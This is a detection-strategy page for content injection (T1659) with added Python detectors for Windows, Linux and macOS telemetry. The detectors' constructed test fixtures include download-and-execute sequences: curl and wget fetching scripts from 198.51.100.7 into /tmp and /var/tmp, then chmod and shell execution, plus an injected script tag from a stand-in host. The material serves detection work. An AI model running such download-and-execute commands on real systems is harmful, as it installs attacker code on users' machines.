Detection Strategy for Content Injection

Technique Detected: Content Injection | T1659

ID: DET0349
Domains: Enterprise
Analytics: AN0992, AN0993, AN0994
Version: 1.0
Created: 21 October 2025
Last Modified: 21 October 2025

Analytics

AN0992

On Windows, detect suspicious file creations and process executions triggered by browser activity (for example, an injected payload written to %AppData% or a Temp directory by the browser process and executed shortly afterwards), and correlate network anomalies with the subsequent local process creation or script execution. Sysmon Event ID 11 (FileCreate) records the creating Image and the TargetFilename, which is what ties the drop to the browser. Two caveats: Security Event 4688 carries the command line only when "Include command line in process creation events" is enabled, and flow records contain no payload, so the "unexpected script or binary content" check below requires full packet capture, a forward proxy, or an IDS that inspects HTTP bodies.

Log Sources
Data Component | Name | Channel
Process Creation (DC0032) | WinEventLog:Security | EventCode=4688
File Creation (DC0039) | WinEventLog:Sysmon | EventCode=11
Network Traffic Content (DC0085) | NSM:Flow | Unexpected script or binary content returned in HTTP response body
Mutable Elements
Field | Description
MonitoredExtensions | File extensions to flag (exe, dll, js, vbs, sh, etc.).
SuspiciousParentProcesses | Browser processes (chrome.exe, firefox.exe, msedge.exe, etc.) monitored as possible parents for malicious activity.
RedirectList | List of suspicious domains or URLs used for malicious redirects.
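The network-side check for AN0992 is the one the Channel column only names: a response body that contradicts its declared Content-Type, or a page that pulls script from, or redirects to, a host on the RedirectList. The following is an added example, not code from the ATT&CK page; it assumes raw HTTP/1.x responses already reassembled from PCAP or exported by a proxy, and the responses and RedirectList hosts in it are constructed for illustration.

```python
"""Flag HTTP responses whose body contradicts their declared Content-Type, or
that pull in content from RedirectList hosts.

Added example, not from the ATT&CK page. Assumes raw HTTP/1.x responses
reassembled from PCAP or exported by a proxy; the responses and the
RedirectList entries below are constructed for illustration.
"""
import re
from urllib.parse import urlparse

# Mirrors the RedirectList mutable element (hypothetical hosts).
REDIRECT_LIST = {"cdn-update.example", "static-assets.example"}

# Executable/script magic that should never appear under a "passive" content type.
EXECUTABLE_MAGIC = [
    (b"MZ", "Windows PE"),
    (b"\x7fELF", "ELF"),
    (b"\xcf\xfa\xed\xfe", "Mach-O 64-bit"),
    (b"\xca\xfe\xba\xbe", "Mach-O universal"),
    (b"#!", "shebang script"),
]
PASSIVE_TYPES = ("text/html", "text/plain", "text/css", "image/", "application/json")

SCRIPT_SRC = re.compile(rb"<script[^>]+src=[\"']?([^\"'\s>]+)", re.I)
META_REFRESH = re.compile(rb"<meta[^>]+http-equiv=[\"']?refresh[^>]*url=([^\"'\s>]+)", re.I)

def split_response(raw):
    """Split a raw HTTP/1.x response into (status line, lower-cased header dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode("latin-1")] = value.strip().decode("latin-1")
    return lines[0].decode("latin-1"), headers, body

def sniff_magic(body):
    for magic, label in EXECUTABLE_MAGIC:
        if body.startswith(magic):
            return label
    return None

def referenced_hosts(headers, body):
    """Hosts the response redirects to (Location, meta refresh) or loads script from."""
    urls = [headers["location"].encode("latin-1")] if "location" in headers else []
    urls += SCRIPT_SRC.findall(body) + META_REFRESH.findall(body)
    hosts = set()
    for u in urls:
        host = urlparse(u.decode("latin-1", "replace")).hostname
        if host:
            hosts.add(host.lower())
    return hosts

def check_response(raw):
    """Return a list of findings; an empty list means the response looks consistent."""
    status, headers, body = split_response(raw)
    declared = headers.get("content-type", "").split(";")[0].strip().lower()
    findings = []
    label = sniff_magic(body)
    if label and declared.startswith(PASSIVE_TYPES):
        findings.append(f"{status}: body is {label} but Content-Type is {declared}")
    bad = referenced_hosts(headers, body) & REDIRECT_LIST
    if bad:
        findings.append(f"{status}: references RedirectList host(s) {sorted(bad)}")
    return findings

# Constructed responses: a PE served as HTML, a page with an injected script tag, a clean page.
RESP_EXE = b"HTTP/1.1 200 OK\r\nContent-Type: text/html; charset=utf-8\r\n\r\nMZ\x90\x00\x03\x00\x00\x00"
RESP_INJECTED = (b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"
                 b"<html><head><script src=\"http://cdn-update.example/u.js\"></script></head><body>hi</body></html>")
RESP_OK = b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<html><body><p>hello</p></body></html>"

if __name__ == "__main__":
    for r in (RESP_EXE, RESP_INJECTED, RESP_OK):
        print(check_response(r) or ["ok"])
```

The magic check is deliberately limited to "passive" content types: an executable under application/octet-stream is a download, not an injection. Extending PASSIVE_TYPES and REDIRECT_LIST is the tuning surface; the parser itself assumes a single, non-chunked response per buffer.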

AN0993

On Linux, detect curl or wget invocations that save an executable or script payload into /tmp or /var/tmp, followed by a chmod or an execution of that file. This needs an audit rule on the execve syscall (for example -a always,exit -F arch=b64 -S execve -k exec); the resulting EXECVE record carries argv, and auditd hex-encodes any argument containing spaces or quotes, so a parser must decode both forms. On the network side, monitor packet captures or IDS/IPS alerts for injected responses and for bodies whose content does not match the declared Content-Type (an ELF binary or shell script served as text/html).

Log Sources
Data Component | Name | Channel
Command Execution (DC0064) | auditd:SYSCALL | execve: Execution of curl or wget writing files to /tmp/* followed by chmod or execution
File Creation (DC0039) | auditd:PATH (nametype=CREATE) or Sysmon for Linux EventID=11 via syslog | File creation of suspicious scripts/binaries in temporary directories
Network Traffic Content (DC0085) | NSM:Flow | Injected content responses with unexpected script/malware signatures
Mutable Elements
Field | Description
TempDirectories | Directories such as /tmp and /var/tmp where injected files are often written.
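The auditd side of AN0993 is a two-step sequence over EXECVE records: a curl or wget whose explicit output path lands in a TempDirectories entry, then a later execve that chmods, interprets, or directly runs that path. The following is an added example, not code from the ATT&CK page; it assumes an execve audit rule is in place, and the audit lines (timestamps, serials, the 198.51.100.7 address) are constructed.

```python
"""Correlate curl/wget downloads into temp directories with a later chmod or
execution of the downloaded file, using auditd EXECVE records.

Added example, not from the ATT&CK page. Assumes an audit rule on execve
(for example: -a always,exit -F arch=b64 -S execve -k exec). The audit lines
below, including timestamps, serials and the 198.51.100.7 address, are constructed.
"""
import os
import re
from collections import namedtuple

TEMP_DIRECTORIES = ("/tmp/", "/var/tmp/")   # the TempDirectories mutable element
DOWNLOADERS = {"curl": {"-o", "--output"}, "wget": {"-O", "--output-document"}}
INTERPRETERS = {"sh", "bash", "dash", "zsh", "python", "python3", "perl"}
WINDOW_SECONDS = 300.0   # how long a download stays eligible for correlation

RECORD_RE = re.compile(r"^type=(\w+) msg=audit\((\d+\.\d+):(\d+)\): (.*)$")
# auditd quotes plain arguments and hex-encodes any that contain quotes, spaces or control chars.
ARG_RE = re.compile(r'\b(a\d+)=(?:"([^"]*)"|([0-9A-Fa-f]+))')

Exec = namedtuple("Exec", "time serial argv")

def parse_execve(line):
    """Return an Exec for an EXECVE record; None for every other record type."""
    m = RECORD_RE.match(line.strip())
    if not m or m.group(1) != "EXECVE":
        return None
    args = {}
    for name, quoted, hexed in ARG_RE.findall(m.group(4)):
        args[int(name[1:])] = quoted if quoted else bytes.fromhex(hexed).decode("utf-8", "replace")
    return Exec(float(m.group(2)), int(m.group(3)), [args[i] for i in sorted(args)])

def output_path(argv):
    """The file a curl/wget command writes to when given an explicit output flag."""
    prog = os.path.basename(argv[0])
    flags = DOWNLOADERS.get(prog)
    if not flags:
        return None
    # curl -O and wget without -O write into the working directory, which needs the
    # companion CWD record and is not handled here.
    for i, a in enumerate(argv[1:], start=1):
        if a in flags and i + 1 < len(argv):
            return argv[i + 1]
        for f in flags:
            if a.startswith(f + "="):
                return a[len(f) + 1:]
    return None

def follow_up(argv, path):
    """How a later execve touches a downloaded path, or None."""
    prog = os.path.basename(argv[0])
    if argv[0] == path:
        return "executed directly"
    if prog == "chmod" and path in argv[1:]:
        return "made executable (chmod)"
    if prog in INTERPRETERS and path in argv[1:]:
        return f"executed via {prog}"
    return None

def correlate(lines):
    """Return (download serial, follow-up serial, path, action) tuples in log order."""
    pending = {}   # path -> Exec of the download
    alerts = []
    for line in lines:
        ev = parse_execve(line)
        if ev is None or not ev.argv:
            continue
        out = output_path(ev.argv)
        if out and out.startswith(TEMP_DIRECTORIES):
            pending[out] = ev
            continue
        for path, dl in list(pending.items()):
            if ev.time - dl.time > WINDOW_SECONDS:
                del pending[path]            # too old to tie to this execution
                continue
            action = follow_up(ev.argv, path)
            if action:
                alerts.append((dl.serial, ev.serial, path, action))
    return alerts

# Constructed audit records. SYSCALL/CWD/PATH companions are omitted except one
# SYSCALL line, kept to show that non-EXECVE records are skipped.
SAMPLE_AUDIT_LINES = """
type=SYSCALL msg=audit(1761043200.101:1001): arch=c000003e syscall=59 success=yes exit=0 ppid=4120 pid=4133 uid=1000 comm="curl" exe="/usr/bin/curl" key="exec"
type=EXECVE msg=audit(1761043200.101:1001): argc=5 a0="curl" a1="-s" a2="-o" a3="/tmp/.update.sh" a4="http://198.51.100.7/u"
type=EXECVE msg=audit(1761043201.455:1002): argc=3 a0="chmod" a1="+x" a2="/tmp/.update.sh"
type=EXECVE msg=audit(1761043202.020:1003): argc=2 a0="/bin/sh" a1="/tmp/.update.sh"
type=EXECVE msg=audit(1761043300.000:1004): argc=3 a0="wget" a1="-q" a2="https://example.org/index.html"
type=EXECVE msg=audit(1761043301.000:1005): argc=2 a0="cat" a1="/tmp/notes.txt"
type=EXECVE msg=audit(1761043400.000:1006): argc=4 a0="wget" a1="-O" a2=2F7661722F746D702F6C6F6164657220322E7368 a3="http://198.51.100.7/l"
type=EXECVE msg=audit(1761043405.000:1007): argc=2 a0="bash" a1=2F7661722F746D702F6C6F6164657220322E7368
type=EXECVE msg=audit(1761043700.000:1008): argc=1 a0="/tmp/.update.sh"
""".strip().splitlines()

if __name__ == "__main__":
    for alert in correlate(SAMPLE_AUDIT_LINES):
        print(alert)
```

Serial 1006 shows the hex-encoded form (the output path contains a space), and serial 1008 shows the window expiring: a direct execution 500 seconds after the download is not correlated, which is the trade-off WINDOW_SECONDS controls.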

AN0994

On macOS, monitor for processes spawned from Safari or other browsers that immediately load scripts or executables, and for file drops in ~/Library/Caches or ~/Downloads that execute shortly after being written. The unified log by itself is not an audit source for process or file creation; in practice those events come from an Endpoint Security client or an EDR built on it (ES_EVENT_TYPE_NOTIFY_EXEC, ES_EVENT_TYPE_NOTIFY_CREATE), which also reports the code-signing status needed to flag unsigned binaries. Altered HTTPS payloads are only visible where TLS is terminated by an inspecting proxy; passively, the observable is the certificate itself (an untrusted issuer, or a subject that does not match the SNI).

Log Sources
Data Component | Name | Channel
Process Creation (DC0032) | macos:unifiedlog | Child processes of Safari, Chrome, or Firefox executing scripting interpreters
File Creation (DC0039) | macos:unifiedlog | File creation of unsigned binaries/scripts in user cache or download directories
Network Traffic Content (DC0085) | NSM:Flow | Content injection observed in HTTPS responses with mismatched certificates or altered payloads
Mutable Elements
Field | Description
MonitoredDirectories | macOS-specific directories where malicious payloads may be written.
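AN0992 and AN0994 describe the same host-side correlation on two platforms: a browser writes a file with a monitored extension into a monitored directory, and within a short window that file is executed (directly, or as an argument to a script interpreter), with the browser spawning an interpreter as a second, independent signal. The following is one added example serving both analytics; it is not code from the ATT&CK page. It assumes the endpoint telemetry (Sysmon Event ID 11 and Security 4688 on Windows, Endpoint Security file and exec events on macOS) has already been normalized into the dict shape shown, and every host, user, path and timestamp in it is constructed.

```python
"""Correlate browser-initiated file drops with their execution shortly after,
and flag browsers that spawn script interpreters.

Added example, not from the ATT&CK page. Assumes endpoint telemetry has
already been normalized into the dicts below (Sysmon Event ID 11 plus
Security 4688 on Windows; Endpoint Security file/exec events on macOS).
Hosts, users, paths and timestamps are constructed for illustration.
"""
import ntpath
import posixpath
from datetime import datetime

# The page's mutable elements as constants. Edge's process is msedge.exe; macOS
# browser binaries carry no .exe suffix.
BROWSERS = {"chrome.exe", "firefox.exe", "msedge.exe", "safari", "google chrome", "firefox"}
MONITORED_EXTENSIONS = {"exe", "dll", "js", "vbs", "hta", "ps1", "sh", "command"}
MONITORED_DIRS = {"windows": ("\\appdata\\", "\\temp\\"),          # %AppData%, %LocalAppData%\Temp
                  "macos": ("/library/caches/", "/downloads/")}
INTERPRETERS = {"windows": {"wscript.exe", "cscript.exe", "powershell.exe", "mshta.exe", "cmd.exe"},
                "macos": {"sh", "bash", "zsh", "osascript", "python3", "perl"}}
WINDOW_SECONDS = 600   # how long a dropped file stays eligible for correlation

def norm(path):
    return path.lower()   # NTFS and default APFS volumes are both case-insensitive

def pathmod(plat):
    return ntpath if plat == "windows" else posixpath

def basename(path, plat):
    return pathmod(plat).basename(norm(path))

def extension(path, plat):
    return pathmod(plat).splitext(norm(path))[1].lstrip(".")

def in_monitored_dir(path, plat):
    return any(d in norm(path) for d in MONITORED_DIRS[plat])

def ts(ev):
    return datetime.strptime(ev["ts"], "%Y-%m-%dT%H:%M:%SZ")

def correlate(events):
    """Return alert dicts, in time order, for the two patterns the analytics describe."""
    drops = {}    # (host, normalized path) -> file_create event by a browser
    alerts = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        plat = ev["platform"]
        if ev["kind"] == "file_create":
            if (basename(ev["image"], plat) in BROWSERS and in_monitored_dir(ev["path"], plat)
                    and extension(ev["path"], plat) in MONITORED_EXTENSIONS):
                drops[(ev["host"], norm(ev["path"]))] = ev
            continue
        # process_create. 4688 carries the command line only when "Include command line
        # in process creation events" is enabled, so cmdline may be absent.
        image, parent = basename(ev["image"], plat), basename(ev["parent"], plat)
        if parent in BROWSERS and image in INTERPRETERS[plat]:
            alerts.append({"rule": "browser_spawned_interpreter", "host": ev["host"],
                           "parent": ev["parent"], "image": ev["image"]})
        cmd = norm(ev.get("cmdline", ""))
        for (host, path), drop in list(drops.items()):
            if host != ev["host"]:
                continue
            if (ts(ev) - ts(drop)).total_seconds() > WINDOW_SECONDS:
                del drops[(host, path)]   # too old; WINDOW_SECONDS is the knob to tune
                continue
            if norm(ev["image"]) == path or path in cmd:
                alerts.append({"rule": "drop_then_execute", "host": host, "path": drop["path"],
                               "dropped_by": drop["image"], "executed_as": ev.get("cmdline", ev["image"])})
    return alerts

CHROME = "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe"
SAFARI = "/Applications/Safari.app/Contents/MacOS/Safari"
SAMPLE_EVENTS = [  # constructed
    {"ts": "2025-10-21T09:00:00Z", "host": "WS02", "platform": "windows", "kind": "file_create",
     "image": "C:\\Program Files\\Mozilla Firefox\\firefox.exe", "path": "C:\\Users\\carol\\AppData\\Roaming\\stage.exe"},
    {"ts": "2025-10-21T10:00:00Z", "host": "WS02", "platform": "windows", "kind": "process_create",  # an hour later: outside the window
     "image": "C:\\Users\\carol\\AppData\\Roaming\\stage.exe", "parent": "C:\\Windows\\explorer.exe",
     "cmdline": "\"C:\\Users\\carol\\AppData\\Roaming\\stage.exe\""},
    {"ts": "2025-10-21T14:03:11Z", "host": "WS01", "platform": "windows", "kind": "file_create",
     "image": CHROME, "path": "C:\\Users\\alice\\AppData\\Local\\Temp\\update.js"},
    {"ts": "2025-10-21T14:03:14Z", "host": "WS01", "platform": "windows", "kind": "process_create",
     "image": "C:\\Windows\\System32\\wscript.exe", "parent": CHROME,
     "cmdline": "\"C:\\Windows\\System32\\wscript.exe\" \"C:\\Users\\alice\\AppData\\Local\\Temp\\update.js\""},
    {"ts": "2025-10-21T14:05:00Z", "host": "WS01", "platform": "windows", "kind": "file_create",  # benign download
     "image": CHROME, "path": "C:\\Users\\alice\\Downloads\\report.pdf"},
    {"ts": "2025-10-21T14:10:02Z", "host": "MAC01", "platform": "macos", "kind": "file_create",
     "image": SAFARI, "path": "/Users/bob/Library/Caches/.helper.sh"},
    {"ts": "2025-10-21T14:10:05Z", "host": "MAC01", "platform": "macos", "kind": "process_create",
     "image": "/bin/sh", "parent": SAFARI, "cmdline": "/bin/sh /Users/bob/Library/Caches/.helper.sh"},
]

if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(alert)
```

The WS02 pair shows the window expiring (a drop executed an hour later is not correlated), and the report.pdf drop shows MonitoredExtensions doing its job. The two rules fire independently, so a browser spawning wscript.exe or /bin/sh is reported even when the file it loads was not observed being written.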